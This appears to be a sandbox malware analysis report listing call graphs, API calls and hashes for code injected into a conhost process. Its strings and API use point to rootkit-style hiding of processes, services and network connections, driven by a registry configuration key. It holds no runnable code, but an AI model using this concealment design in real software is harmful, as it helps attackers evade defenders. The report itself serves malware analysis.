__free_lconv_mon 11 API calls 9244->9247 9250 1d29e8cdb74 __free_lconv_mon 11 API calls 9245->9250 9258 1d29e8cdf78 9245->9258 9251 1d29e8cdb74 __free_lconv_mon 11 API calls 9246->9251 9246->9258 9259 1d29e8ce0bc 9247->9259 9254 1d29e8cdb74 __free_lconv_mon 11 API calls 9248->9254 9248->9258 9249->9244 9261 1d29e8ce0f7 9249->9261 9286 1d29e8d1380 9249->9286 9250->9245 9251->9246 9252 1d29e8ce0d5 9257 1d29e8cdb74 __free_lconv_mon 11 API calls 9252->9257 9253 1d29e8cdb74 __free_lconv_mon 11 API calls 9253->9260 9254->9248 9256 1d29e8cdb74 __free_lconv_mon 11 API calls 9256->9259 9257->9260 9258->9253 9259->9252 9259->9256 9262 1d29e8cd9c0 _invalid_parameter_noinfo 17 API calls 9261->9262 9263 1d29e8ce10c 9262->9263 9265 1d29e8ce13e 9264->9265 9265->9265 9266 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9265->9266 9267 1d29e8ce189 9266->9267 9268 1d29e8d1380 49 API calls 9267->9268 9269 1d29e8ce1bf 9268->9269 9270 1d29e8cd9c0 _invalid_parameter_noinfo 17 API calls 9269->9270 9271 1d29e8ce293 9270->9271 9272 1d29e8ce5e4 23 API calls 9271->9272 9273 1d29e8ce376 9272->9273 9274 1d29e8cf9d8 5 API calls 9273->9274 9275 1d29e8ce3a1 9274->9275 9295 1d29e8cdbc4 9275->9295 9278 1d29e8ce43d 9279 1d29e8ce5e4 23 API calls 9278->9279 9280 1d29e8ce46d 9279->9280 9281 1d29e8cf9d8 5 API calls 9280->9281 9282 1d29e8ce496 9281->9282 9317 1d29e8cdd40 9282->9317 9285 1d29e8ce110 59 API calls 9289 1d29e8d139d 9286->9289 9287 1d29e8d13a2 9288 1d29e8cdadc __free_lconv_mon 11 API calls 9287->9288 9291 1d29e8d13b8 9287->9291 9294 1d29e8d13ac 9288->9294 9289->9287 9289->9291 9292 1d29e8d13ec 9289->9292 9290 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9290->9291 9291->9249 9292->9291 9293 1d29e8cdadc __free_lconv_mon 11 API calls 9292->9293 9293->9294 9294->9290 9296 1d29e8cdbee 9295->9296 9297 1d29e8cdc12 9295->9297 9300 1d29e8cdbfd FindFirstFileExW 9296->9300 9302 1d29e8cdb74 __free_lconv_mon 11 API calls 9296->9302 9298 1d29e8cdc6c 9297->9298 9299 1d29e8cdc17 9297->9299 9301 
1d29e8cf4ac MultiByteToWideChar 9298->9301 9299->9300 9303 1d29e8cdb74 __free_lconv_mon 11 API calls 9299->9303 9308 1d29e8cdc2c 9299->9308 9300->9278 9307 1d29e8cdc88 9301->9307 9302->9300 9303->9308 9304 1d29e8cce3c 12 API calls 9304->9300 9305 1d29e8cdc8f GetLastError 9309 1d29e8cda50 11 API calls 9305->9309 9306 1d29e8cdcca 9306->9300 9311 1d29e8cf4ac MultiByteToWideChar 9306->9311 9307->9305 9307->9306 9310 1d29e8cdcbd 9307->9310 9313 1d29e8cdb74 __free_lconv_mon 11 API calls 9307->9313 9308->9304 9312 1d29e8cdc9c 9309->9312 9314 1d29e8cce3c 12 API calls 9310->9314 9315 1d29e8cdd0e 9311->9315 9316 1d29e8cdadc __free_lconv_mon 11 API calls 9312->9316 9313->9310 9314->9306 9315->9300 9315->9305 9316->9300 9318 1d29e8cdd8e 9317->9318 9319 1d29e8cdd6a 9317->9319 9320 1d29e8cdde8 9318->9320 9321 1d29e8cdd94 9318->9321 9323 1d29e8cdb74 __free_lconv_mon 11 API calls 9319->9323 9328 1d29e8cdd79 9319->9328 9322 1d29e8cf53c WideCharToMultiByte 9320->9322 9324 1d29e8cdda9 9321->9324 9325 1d29e8cdb74 __free_lconv_mon 11 API calls 9321->9325 9321->9328 9331 1d29e8cde0c 9322->9331 9323->9328 9326 1d29e8cce3c 12 API calls 9324->9326 9325->9324 9326->9328 9327 1d29e8cde13 GetLastError 9330 1d29e8cda50 11 API calls 9327->9330 9328->9285 9329 1d29e8cde50 9329->9328 9333 1d29e8cf53c WideCharToMultiByte 9329->9333 9334 1d29e8cde20 9330->9334 9331->9327 9331->9329 9332 1d29e8cde44 9331->9332 9335 1d29e8cdb74 __free_lconv_mon 11 API calls 9331->9335 9336 1d29e8cce3c 12 API calls 9332->9336 9337 1d29e8cde9c 9333->9337 9338 1d29e8cdadc __free_lconv_mon 11 API calls 9334->9338 9335->9332 9336->9329 9337->9327 9337->9328 9338->9328 7533 1d29e8c1ac8 7540 1d29e8c1628 GetProcessHeap HeapAlloc 7533->7540 7535 1d29e8c1ad7 7536 1d29e8c1ade SleepEx 7535->7536 7539 1d29e8c1598 StrCmpIW StrCmpW 7535->7539 7591 1d29e8c18b4 7535->7591 7537 1d29e8c1628 50 API calls 7536->7537 7537->7535 7539->7535 7608 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7540->7608 7542 1d29e8c1650 7609 
1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7542->7609 7544 1d29e8c1658 7610 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7544->7610 7546 1d29e8c1661 7611 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7546->7611 7548 1d29e8c166a 7612 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7548->7612 7550 1d29e8c1673 7613 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7550->7613 7552 1d29e8c167c 7614 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7552->7614 7554 1d29e8c1685 7615 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7554->7615 7556 1d29e8c168e RegOpenKeyExW 7557 1d29e8c16c0 RegOpenKeyExW 7556->7557 7558 1d29e8c18a6 7556->7558 7559 1d29e8c16ff RegOpenKeyExW 7557->7559 7560 1d29e8c16e9 7557->7560 7558->7535 7561 1d29e8c173a RegOpenKeyExW 7559->7561 7562 1d29e8c1723 7559->7562 7616 1d29e8c12bc RegQueryInfoKeyW 7560->7616 7566 1d29e8c175e 7561->7566 7567 1d29e8c1775 RegOpenKeyExW 7561->7567 7625 1d29e8c104c RegQueryInfoKeyW 7562->7625 7569 1d29e8c12bc 16 API calls 7566->7569 7570 1d29e8c17b0 RegOpenKeyExW 7567->7570 7571 1d29e8c1799 7567->7571 7572 1d29e8c176b RegCloseKey 7569->7572 7574 1d29e8c17eb RegOpenKeyExW 7570->7574 7575 1d29e8c17d4 7570->7575 7573 1d29e8c12bc 16 API calls 7571->7573 7572->7567 7578 1d29e8c17a6 RegCloseKey 7573->7578 7576 1d29e8c180f 7574->7576 7577 1d29e8c1826 RegOpenKeyExW 7574->7577 7579 1d29e8c12bc 16 API calls 7575->7579 7581 1d29e8c104c 6 API calls 7576->7581 7582 1d29e8c1861 RegOpenKeyExW 7577->7582 7583 1d29e8c184a 7577->7583 7578->7570 7580 1d29e8c17e1 RegCloseKey 7579->7580 7580->7574 7584 1d29e8c181c RegCloseKey 7581->7584 7586 1d29e8c189c RegCloseKey 7582->7586 7587 1d29e8c1885 7582->7587 7585 1d29e8c104c 6 API calls 7583->7585 7584->7577 7588 1d29e8c1857 RegCloseKey 7585->7588 7586->7558 7589 1d29e8c104c 6 API calls 7587->7589 7588->7582 7590 1d29e8c1892 RegCloseKey 7589->7590 7590->7586 7635 1d29e8c14a4 7591->7635 
7608->7542 7609->7544 7610->7546 7611->7548 7612->7550 7613->7552 7614->7554 7615->7556 7617 1d29e8c148a RegCloseKey 7616->7617 7618 1d29e8c1327 GetProcessHeap HeapAlloc 7616->7618 7617->7559 7619 1d29e8c1476 GetProcessHeap HeapFree 7618->7619 7620 1d29e8c1352 RegEnumValueW 7618->7620 7619->7617 7621 1d29e8c13a5 7620->7621 7621->7619 7621->7620 7623 1d29e8c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7621->7623 7624 1d29e8c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7621->7624 7630 1d29e8c152c 7621->7630 7623->7621 7624->7623 7626 1d29e8c11b5 RegCloseKey 7625->7626 7628 1d29e8c10bf 7625->7628 7626->7561 7627 1d29e8c10cf RegEnumValueW 7627->7628 7628->7626 7628->7627 7629 1d29e8c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7628->7629 7629->7628 7631 1d29e8c1546 7630->7631 7632 1d29e8c157c 7630->7632 7631->7632 7633 1d29e8c155d StrCmpIW 7631->7633 7634 1d29e8c1565 StrCmpW 7631->7634 7632->7621 7633->7631 7634->7631 7636 1d29e8c14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7635->7636 7637 1d29e8c14c1 GetProcessHeap HeapFree 7635->7637 7637->7636 7637->7637 9339 1d29e8d52c9 9340 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9339->9340 9341 1d29e8d52d7 9340->9341 9342 1d29e8d52e2 9341->9342 9343 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9341->9343 9343->9342 8450 1d29e8d41c8 8451 1d29e8d41df 8450->8451 8452 1d29e8d41d9 CloseHandle 8450->8452 8452->8451 7920 1d29e8cb444 7921 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7920->7921 7922 1d29e8cb479 7921->7922 7923 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7922->7923 7924 1d29e8cb487 __except_validate_context_record 7923->7924 7925 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7924->7925 7926 1d29e8cb4cb 7925->7926 7927 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7926->7927 7928 1d29e8cb4d4 7927->7928 7929 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7928->7929 7930 1d29e8cb4dd 7929->7930 7943 1d29e8ca084 7930->7943 7933 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7934 1d29e8cb50d 
__CxxCallCatchBlock 7933->7934 7935 1d29e8ca0c0 __CxxCallCatchBlock 9 API calls 7934->7935 7939 1d29e8cb5be 7935->7939 7936 1d29e8cb5e7 __CxxCallCatchBlock 7937 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7936->7937 7938 1d29e8cb5fa 7937->7938 7940 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7938->7940 7939->7936 7941 1d29e8c9750 __CxxCallCatchBlock 9 API calls 7939->7941 7942 1d29e8cb603 7940->7942 7941->7936 7944 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7943->7944 7945 1d29e8ca095 7944->7945 7946 1d29e8ca0a0 7945->7946 7947 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7945->7947 7948 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7946->7948 7947->7946 7949 1d29e8ca0b1 7948->7949 7949->7933 7949->7934 9344 1d29e8c28c4 9346 1d29e8c290a 9344->9346 9345 1d29e8c2970 9346->9345 9347 1d29e8c3c74 StrCmpNIW 9346->9347 9347->9346 7950 1d29e8c7c60 7951 1d29e8c7c81 7950->7951 7952 1d29e8c7c7c 7950->7952 7954 1d29e8c7d90 7952->7954 7955 1d29e8c7e27 7954->7955 7956 1d29e8c7db3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7954->7956 7955->7951 7956->7955 7957 1d29e8cfc60 GetProcessHeap 8453 1d29e8d39db 8454 1d29e8d3c80 8453->8454 8455 1d29e8d3a1b 8453->8455 8456 1d29e8d3c76 8454->8456 8460 1d29e8d4790 _log10_special 20 API calls 8454->8460 8455->8454 8457 1d29e8d3c62 8455->8457 8458 1d29e8d3a4f 8455->8458 8461 1d29e8d4790 8457->8461 8460->8456 8464 1d29e8d47b0 8461->8464 8465 1d29e8d47ca 8464->8465 8466 1d29e8d47ab 8465->8466 8468 1d29e8d45f0 8465->8468 8466->8456 8469 1d29e8d4630 _log10_special 8468->8469 8472 1d29e8d469c _log10_special 8469->8472 8479 1d29e8d48b0 8469->8479 8471 1d29e8d46d9 8486 1d29e8d4be0 8471->8486 8472->8471 8473 1d29e8d46a9 8472->8473 8482 1d29e8d44cc 8473->8482 8476 1d29e8d46d7 _log10_special 8477 1d29e8c7d70 _log10_special 8 API calls 8476->8477 8478 1d29e8d4701 8477->8478 8478->8466 8492 1d29e8d48d8 8479->8492 8483 1d29e8d4510 _log10_special 8482->8483 8484 1d29e8d4525 8483->8484 8485 1d29e8d4be0 _log10_special 

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000001D29E8C3639
                                                          • PathFindFileNameW.SHLWAPI ref: 000001D29E8C3648
                                                            • Part of subcall function 000001D29E8C3C74: StrCmpNIW.SHLWAPI(?,?,?,000001D29E8C254B), ref: 000001D29E8C3C8C
                                                            • Part of subcall function 000001D29E8C3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3BCE
                                                            • Part of subcall function 000001D29E8C3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3BFC
                                                            • Part of subcall function 000001D29E8C3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C1E
                                                            • Part of subcall function 000001D29E8C3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C39
                                                            • Part of subcall function 000001D29E8C3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C5A
                                                          • CreateThread.KERNELBASE ref: 000001D29E8C368F
                                                            • Part of subcall function 000001D29E8C1D40: GetCurrentThread.KERNEL32 ref: 000001D29E8C1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 1683000f9dc4dd73dd4d2b2071180caecfc822b5b41e0ca1ca8a1718047fff01
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 8C11927061362582FB6CABE0A436BDE2390BB7630DF40416BD576412B7DF7CC04AAA00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: 3c6c80d7e471872b52585788e7528b6a28de4e8c0383d2190911ffd9fcedb16e
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 6D913772B0256087EB6CCF65E058BAD7391F778BACF548126DE3A07799DA38D812C740

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000001D29E8C1628: GetProcessHeap.KERNEL32 ref: 000001D29E8C1633
                                                            • Part of subcall function 000001D29E8C1628: HeapAlloc.KERNEL32 ref: 000001D29E8C1642
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C16B2
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C16DF
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C16F9
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1719
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1734
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1754
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C176F
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C178F
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C17AA
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C17CA
                                                          • SleepEx.KERNELBASE ref: 000001D29E8C1AE3
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C17E5
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1805
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1820
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1840
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C185B
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C187B
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1896
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C18A0
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 06bbfc522ada3b26fdb0d2dcff6431a596baa06a08803a463e175598942553bf
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: EA312F7160362542EB58ABA2D9F13EA53B4BBA9BD8F045023DF39876B5EF30C8518600

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: 1580a5fc35f9f3768bf1c873e8b5578b712228ca5f7f96f0f96ac0613b562586
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 97B17F72213E6881EB6D9FA5D4607D963A4FB6AB88F445017EE39537E5DB34CC80C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 43867f5447f61fa8aeb849ae292d6fda23fdc926b732fdf74d2c93b3d2b02cdd
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: 7D316672206B90DAEB649FA0E8603ED7374FB55748F44442BDA6E47BA8DF38C549C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 883d46e61a5da8a681544cdf0bad746b4b555d7c845fd75ad5ddb1e8eb3cd374
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 0B316272216F9086DB64DF65E8503DE73A4FB99758F500116EABD43BA8DF38C185CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 399d590cb5a3225f575dce46190a1f560c044400ed79aa120d1af8336c17da06
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: 55113C32711F148AEF00DFA0E8643E833A4FB29758F440E26DA7D467A4DF78C2988380
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                          • Instruction ID: 8e83546f846ffe4391c5812cb3cee53622180969079137a32ad33a7652933ac8
                                                          • Opcode Fuzzy Hash: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                          • Instruction Fuzzy Hash: F551D332702AA089FB24DBB2A8507EE7BA1F751798F144116EE7827FA9DB38C001C700
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                          • Instruction ID: e9235f85d6ffaedf5d4777f7bfaa1df89cb1648e988c0adf185c11685169c2d1
                                                          • Opcode Fuzzy Hash: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                          • Instruction Fuzzy Hash: 52F06271B162A48EDBA88F68B81275A77E1F318384FD4805ED6A983B24D23C8061CF04

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 2135414181-2879589442
• Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
• Instruction ID: a227a7f36c8297d69906a4fdadc401eccae57495ff3980576ccd485e5d573718
• Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
• Instruction Fuzzy Hash: 4A71D776312A2486EB149FA5E8A0BDD23B4FFA5B8CF405112DA6E57B79DE38C484C740

Control-flow Graph

APIs
• GetCurrentThread.KERNEL32 ref: 000001D29E8C1D4B
